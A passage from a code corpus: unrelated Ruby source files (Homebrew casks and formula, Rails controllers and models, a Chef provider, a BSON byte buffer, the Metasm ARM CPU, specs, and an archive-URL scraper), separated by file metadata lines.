dirname == '.' ? name : ::File.basename(name) item = Cms::DataFile.select(Cms::DataFile.arel_table[Arel.star]) .select("#{Cms::DataFile.connection.quote(name)} as name_with_option") .public_state.where(name: basename, concept_id: [nil] + concepts.to_a) if dirname == '.' item = item.where(node_id: nil) else item = item.joins(:node).where(Cms::DataFileNode.arel_table[:name].eq(dirname)) end item.order(concepts_order(concepts, :table_name => Cms::DataFile.table_name)).limit(1) end Cms::DataFile.union(relations).index_by(&:name_with_option) end end
34.404494
92
0.630634
e9ce9d6c0b859114d6a88fa6e18120b0dfd7286e
877
cask 'omnigraffle' do if MacOS.version <= :snow_leopard version '5.4.4' sha256 '7bcc64093f46bd4808b1a4cb86cf90c0380a5c5ffffd55ce8f742712818558df' url "http://www.omnigroup.com/ftp1/pub/software/MacOSX/10.6/OmniGraffle-#{version}.dmg" elsif MacOS.version <= :mavericks version '6.0.5' sha256 'a2eff19909d1ba38a4f01b2beecbde2f31f4af43d30e06d2c6921ae8880f85bc' url "http://www.omnigroup.com/ftp1/pub/software/MacOSX/10.8/OmniGraffle-#{version}.dmg" else version '6.6.1' sha256 '7671d46ccd0b53a5917b0ccba5971fe1f1d7990b2d636f25c941b11b03c6e23c' url "http://www.omnigroup.com/ftp1/pub/software/MacOSX/10.10/OmniGraffle-#{version}.dmg" end name 'OmniGraffle' homepage 'https://www.omnigroup.com/omnigraffle/' license :commercial app 'OmniGraffle.app' zap delete: '~/Library/Application Support/The Omni Group/OmniGraffle' end
36.541667
92
0.759407
01f041ca3b498cd3b61721359db998ec5368baa4
1,128
# # Author:: Adam Jacob (<[email protected]>) # Author:: AJ Christensen (<[email protected]>) # Copyright:: Copyright 2009-2017, Chef Software Inc. # License:: Apache License, Version 2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # class Chef class Provider class RubyBlock < Chef::Provider provides :ruby_block def load_current_resource true end def action_run converge_by("execute the ruby block #{new_resource.name}") do new_resource.block.call logger.info("#{new_resource} called") end end alias :action_create :action_run end end end
27.512195
74
0.698582
f89e933c457ad319da8307e594795c67edb87734
96
require File.dirname(__FILE__) + '/spec_helper' describe Kafka do before(:each) do end end
13.714286
47
0.729167
182c38fca958f04480b4184acdae4bba94d3df9b
196
class ChangeServiceToText < ActiveRecord::Migration[4.1] def change change_column :casino_proxy_tickets, :service, :text change_column :casino_service_tickets, :service, :text end end
28
58
0.77551
33d0fd098999fa7ad40d10fb36cf59610699c2aa
274
class Todos < Cask version 'latest' sha256 :no_check url 'http://dbachrach.com/opensoft/downloads/apps/Todos.dmg' appcast 'http://www.dbachrach.com/opensoft/appcasts/Todos.xml' homepage 'http://dbachrach.com/opensoft/index.php?page=Todos' link 'Todos.app' end
24.909091
64
0.740876
ff96270b2eee892da9119e7dcda9af3e98a5f207
1,154
# coding: utf-8 lib = File.expand_path('../lib', __FILE__) $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib) require 'rails_translation_manager/version' Gem::Specification.new do |spec| spec.name = "rails_translation_manager" spec.version = RailsTranslationManager::VERSION spec.authors = ["Edd Sowden"] spec.email = ["[email protected]"] spec.summary = %q{Tasks to manage translation files} spec.description = "" spec.homepage = "" spec.license = "MIT" spec.files = `git ls-files -z`.split("\x0") spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) } spec.test_files = spec.files.grep(%r{^(test|spec|features)/}) spec.require_paths = ["lib"] spec.add_dependency "activesupport" spec.add_dependency "csv", "~> 3.2" spec.add_dependency "i18n-tasks" spec.add_dependency "rails-i18n" spec.add_development_dependency "bundler" spec.add_development_dependency "rake", "~> 10.0" spec.add_development_dependency "minitest" spec.add_development_dependency "rspec" spec.add_development_dependency "byebug" end
36.0625
74
0.690641
e92f9db9b73b4dccf52dec73cf9ebde164331cd2
968
require 'spec_helper' describe "Subscription" do context "as a user" do before do reset_spree_preferences do |config| config.default_country_id = create(:country).id end create(:payment_method) create(:free_shipping_method) @product1 = create(:subscribable_product, name: 'Giant Steps', available_on: '2011-01-06 18:21:13:') @product2 = create(:product, name: 'Bella Donavan', available_on: '2011-01-06 18:21:13:') @user = create(:user, email: "[email protected]", password: "secret", password_confirmation: "secret") end context "after order completion with subscribable product" do before do add_to_cart("Giant Steps") complete_checkout_with_login("[email protected]", "secret") end it "should find a subscription area in the user account page" do visit spree.account_path page.should have_content "My subscriptions" end end end end
31.225806
109
0.676653
4ac4676e740fce4fd41d77be7b3fe1882b50d837
840
# encoding: utf-8 require File.expand_path(File.dirname(__FILE__) + '/spec_helper') describe "StringToPinyin" do before :each do @single_char = "名" @multiple_chars = "中华人民共和国" @nil_char = "a" @punctuated = "你好! 你是中国人吗? <- that was mandarin" end it "should return pinyin for a single character if found" do @single_char.to_pinyin.should == 'míng' end it "should return pinyin with spaces in between for multiple characters if found" do @multiple_chars.to_pinyin.should == 'zhōng huá rén mín gòng hé guó' end it "should return a character if its not found in the index" do @nil_char.to_pinyin.should == 'a' end it "should return 'non-simplified chinese characters' as they are" do @punctuated.to_pinyin.should == 'nĭ hăo ! nĭ shì zhōng guó rén ma ? <- that was mandarin' end end
30
93
0.694048
794fe55c4b0e5061b1b162ab1c96bde349c491fc
73
# frozen_string_literal: true module ActionAuth VERSION = "0.1.0" end
12.166667
29
0.739726
bf4b0dc7497e886ae36a30d43421746a9f01dc4d
252
class AddFeatureIdToForemTopic < ActiveRecord::Migration def change add_column :forem_topics, :feature_id, :int add_column :forem_topics, :area_id, :int add_index :forem_topics, :feature_id add_index :forem_topics, :area_id end end
28
56
0.757937
f78d2c2bee5ffcba77dfccfa8bfcc6bcf87790eb
3,132
# Encoding: utf-8 # # This is auto-generated code, changes will be overwritten. # # Copyright:: Copyright 2021, Google Inc. All Rights Reserved. # License:: Licensed under the Apache License, Version 2.0. # # Code generated by AdsCommon library 1.0.3 on 2021-05-07 00:48:53. require 'ads_common/savon_service' require 'ad_manager_api/v202105/ad_rule_service_registry' module AdManagerApi; module V202105; module AdRuleService class AdRuleService < AdsCommon::SavonService def initialize(config, endpoint) namespace = 'https://www.google.com/apis/ads/publisher/v202105' super(config, endpoint, namespace, :v202105) end def create_ad_rules(*args, &block) return execute_action('create_ad_rules', args, &block) end def create_ad_rules_to_xml(*args) return get_soap_xml('create_ad_rules', args) end def create_ad_spots(*args, &block) return execute_action('create_ad_spots', args, &block) end def create_ad_spots_to_xml(*args) return get_soap_xml('create_ad_spots', args) end def create_break_templates(*args, &block) return execute_action('create_break_templates', args, &block) end def create_break_templates_to_xml(*args) return get_soap_xml('create_break_templates', args) end def get_ad_rules_by_statement(*args, &block) return execute_action('get_ad_rules_by_statement', args, &block) end def get_ad_rules_by_statement_to_xml(*args) return get_soap_xml('get_ad_rules_by_statement', args) end def get_ad_spots_by_statement(*args, &block) return execute_action('get_ad_spots_by_statement', args, &block) end def get_ad_spots_by_statement_to_xml(*args) return get_soap_xml('get_ad_spots_by_statement', args) end def get_break_templates_by_statement(*args, &block) return execute_action('get_break_templates_by_statement', args, &block) end def get_break_templates_by_statement_to_xml(*args) return get_soap_xml('get_break_templates_by_statement', args) end def perform_ad_rule_action(*args, &block) return execute_action('perform_ad_rule_action', args, &block) end def perform_ad_rule_action_to_xml(*args) return get_soap_xml('perform_ad_rule_action', args) end def update_ad_rules(*args, &block) return execute_action('update_ad_rules', args, &block) end def update_ad_rules_to_xml(*args) return get_soap_xml('update_ad_rules', args) end def update_ad_spots(*args, &block) return execute_action('update_ad_spots', args, &block) end def update_ad_spots_to_xml(*args) return get_soap_xml('update_ad_spots', args) end def update_break_templates(*args, &block) return execute_action('update_break_templates', args, &block) end def update_break_templates_to_xml(*args) return get_soap_xml('update_break_templates', args) end private def get_service_registry() return AdRuleServiceRegistry end def get_module() return AdManagerApi::V202105::AdRuleService end end end; end; end
28.216216
77
0.726373
ab44b33bab9a2eb501841b58e11dbbacfc9d44d5
4,638
# A byte buffer. module BSON class ByteBuffer attr_reader :order, :max_size INT32_PACK = 'l<'.freeze INT64_PACK = 'q<'.freeze DOUBLE_PACK = 'E'.freeze def initialize(initial_data="", max_size=DEFAULT_MAX_BSON_SIZE) @str = case initial_data when String then if initial_data.respond_to?(:force_encoding) initial_data.force_encoding('binary') else initial_data end when BSON::ByteBuffer then initial_data.to_a.pack('C*') else initial_data.pack('C*') end @cursor = @str.length @max_size = max_size end def rewind @cursor = 0 end def position @cursor end def position=(val) @cursor = val end def clear @str = "" @str.force_encoding('binary') if @str.respond_to?(:force_encoding) rewind end def size @str.size end alias_method :length, :size # Appends a second ByteBuffer object, +buffer+, to the current buffer. def append!(buffer) @str << buffer.to_s self end # Prepends a second ByteBuffer object, +buffer+, to the current buffer. def prepend!(buffer) @str = buffer.to_s + @str self end def put(byte, offset=nil) @cursor = offset if offset if more? @str[@cursor] = chr(byte) else ensure_length(@cursor) @str << chr(byte) end @cursor += 1 end def put_binary(data, offset=nil) @cursor = offset if offset if defined?(BINARY_ENCODING) data = data.dup.force_encoding(BINARY_ENCODING) end if more? @str[@cursor, data.length] = data else ensure_length(@cursor) @str << data end @cursor += data.length end def put_array(array, offset=nil) @cursor = offset if offset if more? @str[@cursor, array.length] = array.pack("C*") else ensure_length(@cursor) @str << array.pack("C*") end @cursor += array.length end def put_num(i, offset, bytes) pack_type = bytes == 4 ? INT32_PACK : INT64_PACK @cursor = offset if offset if more? @str[@cursor, bytes] = [i].pack(pack_type) else ensure_length(@cursor) @str << [i].pack(pack_type) end @cursor += bytes end def put_int(i, offset=nil) put_num(i, offset, 4) end def put_long(i, offset=nil) put_num(i, offset, 8) end def put_double(d, offset=nil) a = [] [d].pack(DOUBLE_PACK).each_byte { |b| a << b } put_array(a, offset) end # If +size+ == nil, returns one byte. Else returns array of bytes of length # # +size+. if "x"[0].is_a?(Integer) def get(len=nil) one_byte = len.nil? len ||= 1 check_read_length(len) start = @cursor @cursor += len if one_byte @str[start] else @str[start, len].unpack("C*") end end else def get(len=nil) one_byte = len.nil? len ||= 1 check_read_length(len) start = @cursor @cursor += len if one_byte @str[start, 1].ord else @str[start, len].unpack("C*") end end end def get_int check_read_length(4) vals = @str[@cursor..@cursor+3] @cursor += 4 vals.unpack(INT32_PACK)[0] end def get_long check_read_length(8) vals = @str[@cursor..@cursor+7] @cursor += 8 vals.unpack(INT64_PACK)[0] end def get_double check_read_length(8) vals = @str[@cursor..@cursor+7] @cursor += 8 vals.unpack(DOUBLE_PACK)[0] end def more? @cursor < @str.size end def ==(other) other.respond_to?(:to_s) && @str == other.to_s end def to_a(format="C*") @str.unpack(format) end def unpack(format="C*") to_a(format) end def to_s @str end def dump @str.each_byte do |c, i| $stderr.puts "#{'%04d' % i}: #{'%02x' % c} #{'%03o' % c} #{'%s' % c.chr} #{'%3d' % c}" i += 1 end end private def ensure_length(length) if @str.size < length @str << NULL_BYTE * (length - @str.size) end end def chr(byte) if byte < 0 [byte].pack('c') else byte.chr end end def check_read_length(len) raise "attempt to read past end of buffer" if @cursor + len > @str.length end end end
20.522124
94
0.53191
21146edf9c8b0f02c740448e1a93c2c85b36e565
2,793
class Pulseaudio < Formula desc "Sound system for POSIX OSes" homepage "https://wiki.freedesktop.org/www/Software/PulseAudio/" url "https://www.freedesktop.org/software/pulseaudio/releases/pulseaudio-14.0.tar.xz" sha256 "a834775d9382b055504e5ee7625dc50768daac29329531deb6597bf05e06c261" # The regex here avoids x.99 releases, as they're pre-release versions. livecheck do url :stable regex(/href=["']?pulseaudio[._-]v?((?!\d+\.9\d+)\d+(?:\.\d+)+)\.t/i) end bottle do sha256 "36f025d67efa9bc8198e4810dfc58b584d28f7980d4a98a3c2310f84caf7b773" => :big_sur sha256 "b395d9b2f2c5a89971b5fa65abeb9c7a3469f4572a496b554eacbaaff09a6586" => :arm64_big_sur sha256 "fc7ff97eaf91b6bcfeeb391b6c885c2fd9c6d3843ab668d9e85a68d7bb55f92d" => :catalina sha256 "78718069edbad1c576f4abf5c6fa2e6945e08699b006863dc3e94e27990f044c" => :mojave end head do url "https://gitlab.freedesktop.org/pulseaudio/pulseaudio.git" depends_on "autoconf" => :build depends_on "automake" => :build depends_on "gettext" => :build depends_on "intltool" => :build end depends_on "pkg-config" => :build depends_on "json-c" depends_on "libsndfile" depends_on "libsoxr" depends_on "libtool" depends_on "[email protected]" depends_on "speexdsp" uses_from_macos "perl" => :build uses_from_macos "expat" uses_from_macos "m4" def install args = %W[ --disable-dependency-tracking --disable-silent-rules --prefix=#{prefix} --enable-coreaudio-output --disable-neon-opt --disable-nls --disable-x11 --with-mac-sysroot=#{MacOS.sdk_path} --with-mac-version-min=#{MacOS.version} ] if build.head? # autogen.sh runs bootstrap.sh then ./configure system "./autogen.sh", *args else system "./configure", *args end system "make", "install" end plist_options manual: "pulseaudio" def plist <<~EOS <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key> <string>#{plist_name}</string> <key>ProgramArguments</key> <array> <string>#{opt_bin}/pulseaudio</string> <string>--exit-idle-time=-1</string> <string>--verbose</string> </array> <key>RunAtLoad</key> <true/> <key>KeepAlive</key> <true/> <key>StandardErrorPath</key> <string>#{var}/log/#{name}.log</string> <key>StandardOutPath</key> <string>#{var}/log/#{name}.log</string> </dict> </plist> EOS end test do assert_match "module-sine", shell_output("#{bin}/pulseaudio --dump-modules") end end
29.09375
108
0.649839
28f06fc899e7a8a1564699456f7b1e86c80acdb9
819
class SessionsController < ApplicationController def new end def create @user = User.find_by(email: params[:session][:email].downcase) if @user && @user.authenticate(params[:session][:password]) if @user.activated? # log user and redirect to show page log_in @user params[:session][:remember_me] == '1' ? remember(@user) : forget(@user) redirect_back_or @user else message = "Account not activated. " message += "Check your email for the activation link." flash[:warning] = message redirect_to root_url end else # create error message flash.now[:danger] = "Invalid email/password combination" render 'new' end end def destroy log_out if logged_in? redirect_to root_url end end
26.419355
79
0.632479
0125cc11f1f7870ae7f463c6fb02dc7445350a1c
3,742
# encoding: utf-8 module RailsBestPractices module Prepares # Remember controllers and controller methods class ControllerPrepare < Core::Check include Core::Check::Classable include Core::Check::InheritedResourcesable include Core::Check::Accessable interesting_nodes :class, :var_ref, :vcall, :command, :def interesting_files CONTROLLER_FILES DEFAULT_ACTIONS = %w(index show new create edit update destroy) def initialize @controllers = Prepares.controllers @methods = Prepares.controller_methods @helpers = Prepares.helpers @inherited_resources = false end # check class node to remember the class name. # also check if the controller is inherit from InheritedResources::Base. add_callback :start_class do |node| @controllers << @klass if @inherited_resources @actions = DEFAULT_ACTIONS end end # remember the action names at the end of class node if the controller is a InheritedResources. add_callback :end_class do |node| if @inherited_resources && "ApplicationController" != current_class_name @actions.each do |action| @methods.add_method(current_class_name, action, {"file" => node.file, "line_number" => node.line_number}) end end end # check if there is a DSL call inherit_resources. add_callback :start_var_ref do |node| if @inherited_resources @actions = DEFAULT_ACTIONS end end # check if there is a DSL call inherit_resources. add_callback :start_vcall do |node| if @inherited_resources @actions = DEFAULT_ACTIONS end end # restrict actions for inherited_resources add_callback :start_command do |node| if "include" == node.message.to_s @helpers.add_module_descendant(node.arguments.all.first.to_s, current_class_name) elsif @inherited_resources && "actions" == node.message.to_s if "all" == node.arguments.all.first.to_s @actions = DEFAULT_ACTIONS option_argument = node.arguments.all[1] if option_argument && :bare_assoc_hash == option_argument.sexp_type && option_argument.hash_value("except") @actions -= option_argument.hash_value("except").to_object end else @actions = node.arguments.all.map(&:to_s) end end end # check def node to remember all methods. # # the remembered methods (@methods) are like # { # "PostsController" => { # "save" => {"file" => "app/controllers/posts_controller.rb", "line_number" => 10, "unused" => false}, # "find" => {"file" => "app/controllers/posts_controller.rb", "line_number" => 10, "unused" => false} # }, # "CommentsController" => { # "create" => {"file" => "app/controllers/comments_controller.rb", "line_number" => 10, "unused" => false}, # } # } add_callback :start_def do |node| method_name = node.method_name.to_s @methods.add_method(current_class_name, method_name, {"file" => node.file, "line_number" => node.line_number}, current_access_control) end # ask Reviews::RemoveUnusedMoethodsInHelperReview to check the controllers who include helpers. add_callback :after_check do descendants = @helpers.map(&:descendants).flatten if descendants.present? Reviews::RemoveUnusedMethodsInHelpersReview.interesting_files *descendants.map { |descendant| %r|#{descendant.underscore}| } end end end end end
38.183673
142
0.635222
ab2c262fea70755ceff41f251a995876439a5c54
1,408
# frozen_string_literal: true class PremiumController < ApplicationController before_action :authenticate_user!, except: [:index] def create price_id = Stripe::Price.list(active: true, recurring: {interval: "month"}).first.id session = Stripe::Checkout::Session.create( success_url: "#{success_premium_index_url}?session_id={CHECKOUT_SESSION_ID}", cancel_url: cancel_premium_index_url, mode: "subscription", allow_promotion_codes: true, customer_email: current_user.email, automatic_tax: {enabled: true}, metadata: {user_id: current_user.id}, line_items: [{quantity: 1, price: price_id}] ) redirect_to session.url, allow_other_host: true end def update session = Stripe::BillingPortal::Session.create( customer: current_user.stripe_customer_id, return_url: shots_url ) redirect_to session.url, allow_other_host: true end def success session = Stripe::Checkout::Session.retrieve(params[:session_id]) subscription = Stripe::Subscription.retrieve(session.subscription) current_user.update( stripe_customer_id: session.customer, premium_expires_at: Time.zone.at(subscription.current_period_end) ) flash[:notice] = "Subscribing was successful" redirect_to shots_path end def cancel flash[:alert] = "Subscribing was cancelled." redirect_to shots_path end end
31.288889
88
0.723722
bbf7d8a1b4721149a2385b006d72ad41b74f536f
118
class AddUserIdToReview < ActiveRecord::Migration def change add_column :reviews, :user_id, :integer end end
19.666667
49
0.754237
ab9a36a3a566de39517c716ace1a36b29f20ccf6
1,637
# This file is part of Metasm, the Ruby assembly manipulation suite # Copyright (C) 2006-2009 Yoann GUILLOT # # Licence is LGPL, see LICENCE in the top-level directory require 'metasm/main' module Metasm class ARM < CPU class Reg class << self attr_accessor :s_to_i, :i_to_s end @i_to_s = %w[r0 r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 sp lr pc] @s_to_i = { 'wr' => 7, 'sb' => 9, 'sl' => 10, 'fp' => 11, 'ip' => 12, 'sp' => 13, 'lr' => 14, 'pc' => 15 } 15.times { |i| @s_to_i["r#{i}"] = i } 4.times { |i| @s_to_i["a#{i+1}"] = i } 8.times { |i| @s_to_i["v#{i+1}"] = i+4 } attr_accessor :i, :stype, :shift, :updated def initialize(i, stype=:lsl, shift=0) @i = i @stype = stype @shift = shift end def symbolic r = self.class.i_to_s[@i].to_sym if @stype == :lsl and @shift == 0 r else r # TODO shift/rotate/... end end end class Memref attr_accessor :base, :offset, :sign, :incr def initialize(base, offset, sign=:+, incr=nil) @base, @offset, @sign, @incr = base, offset, sign, incr end def symbolic(len=4, orig=nil) o = @offset o = o.symbolic if o.kind_of? Reg p = Expression[@base.symbolic, @sign, o].reduce Indirection[p, len, orig] end end class RegList attr_accessor :list, :usermoderegs def initialize(l=[]) @list = l end end def initialize(endianness = :little) super() @endianness = endianness @size = 32 end def init_opcode_list init_latest @opcode_list end end class ARM_THUMB < ARM end end
21.539474
110
0.571778
5d31c9310ccd3ce794761efc942c7063200b6cba
413
Nyauth.configure do |config| # Ruby2.3以前では、文字長が多い場合、それ以降の文字を切り捨てて動作してくれていたが、 # Ruby2.4以降では、ArgumentErrorを返すようになったため、32文字指定にする encryption_secret = ENV['NYAUTH_ENCRYPTION_SECRET'] || 'rails6dd08eff1c2cf5aecb54cb1a97266817b58cc27f06be9e95918c06607d3950d623a4fd4c0c306d2216cdaf3f99871e21e0e975a5e64ef5cf286b68ed8d7379a4' config.encryption_secret = encryption_secret[0..31] config.use_cookie_auth = true end
51.625
192
0.859564
fff271e64eaea4c4af4182391d23c99ca7a17f7f
847
# -*- encoding: utf-8 -*- Gem::Specification.new do |s| s.name = "declarative_authorization" s.version = "1.0.0.pre" s.required_ruby_version = ">= 2.0.0" s.authors = ["Steffen Bartsch"] s.summary = "declarative_authorization is a Rails plugin for maintainable authorization based on readable authorization rules." s.email = "[email protected]" s.files = %w{CHANGELOG MIT-LICENSE README.rdoc Rakefile authorization_rules.dist.rb garlic_example.rb init.rb} + Dir["app/**/*.rb"] + Dir["app/**/*.erb"] + Dir["config/*"] + Dir["lib/*.rb"] + Dir["lib/**/*.rb"] + Dir["lib/tasks/*"] + Dir["test/*"] s.has_rdoc = true s.extra_rdoc_files = ['README.rdoc', 'CHANGELOG'] s.homepage = %q{http://github.com/stffn/declarative_authorization} s.add_dependency('rails', '>= 4.0.0', '< 5.2.0') s.add_development_dependency('test-unit') end
47.055556
249
0.672963
e21dbb2d161da6a9e444c58e4d7676f1b8979a0a
3,337
require "addressable/uri" require "uri" require_relative "../common/colorize" require_relative "../common/data" require_relative "../common/format" require_relative "../common/query" # href='*.Z' # href="*.Z" # href=*.Z PAGE_WITH_ARCHIVES_REGEXP = Regexp.new( " href[[:space:]]*=[[:space:]]* (?: ' ( [^']+ #{ARCHIVE_POSTFIX_FOR_REGEXP} ) ' | \" ( [^\"]+ #{ARCHIVE_POSTFIX_FOR_REGEXP} ) \" | ( [^[:space:]>]+ #{ARCHIVE_POSTFIX_FOR_REGEXP} ) [[:space:]>] ) ", Regexp::IGNORECASE | Regexp::MULTILINE | Regexp::EXTENDED ) .freeze # -r--r--r-- 1 257 7070 337967 Jul 29 1992 *.Z LISTING_WITH_ARCHIVES_REGEXP = Regexp.new( " ( [^[:space:]]+ #{ARCHIVE_POSTFIX_FOR_REGEXP} ) (?: [[:space:]] | \\Z ) ", Regexp::IGNORECASE | Regexp::MULTILINE | Regexp::EXTENDED ) .freeze def get_archive_urls_from_page_url(url) begin uri = URI url scheme = uri.scheme case scheme when "ftp" data, is_listing = get_content_or_listing_from_ftp uri regexp = is_listing ? LISTING_WITH_ARCHIVES_REGEXP : PAGE_WITH_ARCHIVES_REGEXP when "http", "https" data = get_http_content uri regexp = PAGE_WITH_ARCHIVES_REGEXP else raise StandardError, "unknown uri scheme: #{scheme}" end rescue QueryError => query_error warn query_error return [] rescue StandardError => error warn error return nil end data .scan(regexp) .flatten .compact .map do |archive_url| uri = URI Addressable::URI.parse(url).join(archive_url).to_s scheme = uri.scheme case scheme when "ftp", "http", "https" uri.to_s else raise StandardError, "unknown uri scheme: #{scheme}" end rescue StandardError => error warn error next nil end .compact end def get_archive_urls(page_urls) valid_page_urls = [] invalid_page_urls = [] archive_urls = [] page_urls .shuffle .each_with_index do |page_url, index| percent = format_percent index, page_urls.length warn "- #{percent}% checking page, url: #{page_url}" new_archive_urls = get_archive_urls_from_page_url page_url next if new_archive_urls.nil? if new_archive_urls.empty? invalid_page_urls << page_url page_text = "invalid" else valid_page_urls << page_url page_text = "valid".light_green end archive_text = colorize_length new_archive_urls.length warn "received #{archive_text} archive urls, page is #{page_text}" archive_urls.concat new_archive_urls end valid_page_urls = valid_page_urls.sort.uniq invalid_page_urls = invalid_page_urls.sort.uniq archive_urls = archive_urls.sort.uniq valid_page_text = colorize_length valid_page_urls.length invalid_page_text = colorize_length invalid_page_urls.length archive_text = colorize_length archive_urls.length warn \ "-- received #{archive_text} archive urls " \ "from #{valid_page_text} valid page urls, " \ "#{invalid_page_text} invalid page urls" [valid_page_urls, invalid_page_urls, archive_urls] end
22.70068
94
0.622415
bf7cc06d6f5732cf10648cfc6102c196c8d774af
1,066
{ matrix_id: '784', name: 'nemeth20', group: 'Nemeth', description: 'Newton-Schultz iteration, Z_k+1=Z_k+(1/2)*(I-(Z_k)^2)*Z_k. This is Z_20', author: 'K. Nemeth', editor: 'T. Davis', date: '1999', kind: 'subsequent theoretical/quantum chemistry problem', problem_2D_or_3D: '0', num_rows: '9506', num_cols: '9506', nonzeros: '971870', num_explicit_zeros: '0', num_strongly_connected_components: '1', num_dmperm_blocks: '1', structural_full_rank: 'true', structural_rank: '9506', pattern_symmetry: '1.000', numeric_symmetry: '1.000', rb_type: 'real', structure: 'symmetric', cholesky_candidate: 'no', positive_definite: 'no', notes: 'next: Nemeth/nemeth21 first: Nemeth/nemeth01 ', norm: '9.993786e-01', min_singular_value: '4.525611e-01', condition_number: '2.208273e+00', svd_rank: '9506', sprank_minus_rank: '0', null_space_dimension: '0', full_numerical_rank: 'yes', image_files: 'nemeth20.png,nemeth20_svd.png,nemeth20_graph.gif,', }
29.611111
91
0.64728
08105cd979cbc2d3a428204867e9324c87fdd410
807
ENV['RACK_ENV'] = 'test' require("bundler/setup") Bundler.require(:default, :test) set(:root, Dir.pwd()) require('capybara/rspec') Capybara.app = Sinatra::Application set(:show_exceptions, false) require('./app') Dir[File.dirname(__FILE__) + '/../lib/*.rb'].each { |file| require file } RSpec.configure do |config| config.after(:each) do User.all().each() do |store| store.destroy() end end end RSpec.configure do |config| config.after(:each) do Group.all().each() do |brand| brand.destroy() end end end RSpec.configure do |config| config.after(:each) do Service.all().each() do |brand| brand.destroy() end end end RSpec.configure do |config| config.after(:each) do Community.all().each() do |brand| brand.destroy() end end end
17.933333
73
0.645601
d53b8630089e43249de4dae114ef7e5a6d542fc7
48
module CoinbaseCommerce VERSION = "0.8.6" end
12
23
0.729167
b94191dc4dd7d9d632c8d4040e0af0129eb8d512
2,114
class Review < ApplicationRecord default_scope { order(created_at: :desc) } belongs_to :reviewee, class_name: "User" belongs_to :reviewer, class_name: "User" belongs_to :post attr_accessor :activation_token before_create :create_activation_digest validates :reviewer_id, presence: true validates :reviewee_id, presence: true # validates :satisfied, presence: true # validates :reviewee_review, presence: true # validates :comment, presence: true def user_name reviewee.name end def user reviewee end def user_id reviewee.id end def reviewer_name reviewer.name end def reviewer_up_votes reviewer.upvotes_size end def reviewer_down_votes reviewer.downvotes_size end # Sends activation email. def send_review_activation_email(reviewer, reviewee, post) UserMailer.review_activation(reviewer.id, reviewee.id, self.id, post.id, activation_token).deliver_later(wait_until: 1.minute.from_now) end # Returns the hash digest of the given string. def self.digest(string) cost = ActiveModel::SecurePassword.min_cost ? BCrypt::Engine::MIN_COST : BCrypt::Engine.cost BCrypt::Password.create(string, cost: cost) end # Returns a random token. def self.new_token SecureRandom.urlsafe_base64 end # Activates an account. def activate update_columns(activated: true, activated_at: Time.zone.now) end # returns true if the given token matches the digest (activation_digest) def authenticated?(attribute, token) digest = self.send("#{attribute}_digest") return false if digest.nil? BCrypt::Password.new(digest).is_password?(token) #renew the remember_digest with new password end def activation_expired? return self.activated_at < 7.days.ago if self.activated_at.present? return true end private def create_activation_digest self.activation_token = Review.new_token self.activation_digest = Review.digest(activation_token) end #creates and assigns the activation token and digest. end
27.454545
137
0.722327
9145b238628cfbfeb2afa92226c7dc7659e19e43
83
# desc "Explaining what the task does" # task :sober do # # Task goes here # end
16.6
38
0.662651
7aeec4dc0aa292ca52ddd631d5a54be1e2f2691d
1,001
#!/usr/bin/ruby require 'livejournal/database' require 'livejournal/entry' require 'test/unit' class TC_Database < Test::Unit::TestCase FILENAME = '/tmp/test.db' def setup @db = LiveJournal::Database.new(FILENAME, true) end def teardown @db.close File.delete FILENAME end def test_metas @db.username = 'foo' assert_equal(@db.username, 'foo') end def roundtrip e @db.store_entry e new_e = @db.get_entry e.itemid assert_equal(e, new_e) end def test_roundtrips e = LiveJournal::Entry.new e.itemid = 1 e.anum = 2 e.subject = 'subject here' e.event = 'event here' e.time = LiveJournal::coerce_gmt Time.now roundtrip e e = LiveJournal::Entry.new e.itemid = 1 e.anum = 2 e.subject = 'subject here' e.event = 'eventblah here' e.time = LiveJournal::coerce_gmt Time.now e.comments = :noemail e.preformatted = true e.security = :friends roundtrip e end end # vim: ts=2 sw=2 et :
18.2
51
0.643357
21d768f7c91a9a1eeb4d7aa75250762c2002c144
93
require 'simplecov' SimpleCov.start do add_filter 'spec' add_group 'Libraries', 'lib' end
18.6
30
0.752688
bb208394e78914c8002d7141e7d8301077ad2a38
992
# frozen_string_literal: true require_relative '../spec_helper' def suites JSON.parse(File.read(File.expand_path('../suite.json', __FILE__).strip)) end module Aws module S3 describe Client do suites.each_with_index do |suite, i| it "produces correct url pattern with configuration #{i}" do unless suite['ConfiguredAddressingStyle'] == 'default' path_style = true end client = Aws::S3::Client.new( stub_responses: true, region: suite['Region'], force_path_style: path_style, use_dualstack_endpoint: suite['UseDualstack'], use_accelerate_endpoint: suite['UseS3Accelerate'], s3_us_east_1_regional_endpoint: suite['S3RegionalEndpoint'] ) resp = client.list_objects(bucket: suite['Bucket']) expect(resp.context.http_request.endpoint.to_s) .to start_with(suite['ExpectedUri']) end end end end end
30.060606
74
0.631048
1a7999ea6693bfc2d7a5327106af65d788caddc5
1,898
require "capybara_helper" describe "Stations", type: :system do it "overview page" do station = FactoryBot.create :station, name: "Marilu", strategy: :radiobox FactoryBot.create :track, station: station, track_info: FactoryBot.create(:track_info) visit "/" click_on "Stations" expect(page).to have_text "Stations Overview" expect(page).to have_table_with_exact_data([ ["Name", "Type", "Active", "Created", "Last update", "tracks last 24h", "all tracks", ""], ["Marilu", "radiobox", "true", Time.current.strftime("%d.%m.%Y"), "", "1", "1", "Edit Show"] ]) end it "creates a new station" do FactoryBot.create :station, name: "Marilu", strategy: :radiobox visit "/" click_on "Stations" click_on "Edit" expect(page).to have_text "Editing Station" fill_in "Name", with: "fm42" click_on "Save" expect(page).to have_content "Station was successfully updated." expect(page).to have_table_with_exact_data([ ["Name", "Type", "Active", "Created", "Last update", "tracks last 24h", "all tracks", ""], ["fm42", "radiobox", "true", Time.current.strftime("%d.%m.%Y"), "", "0", "0", "Edit Show"] ]) end it "edits a existin station" do visit "/" click_on "Stations" click_on "Add" expect(page).to 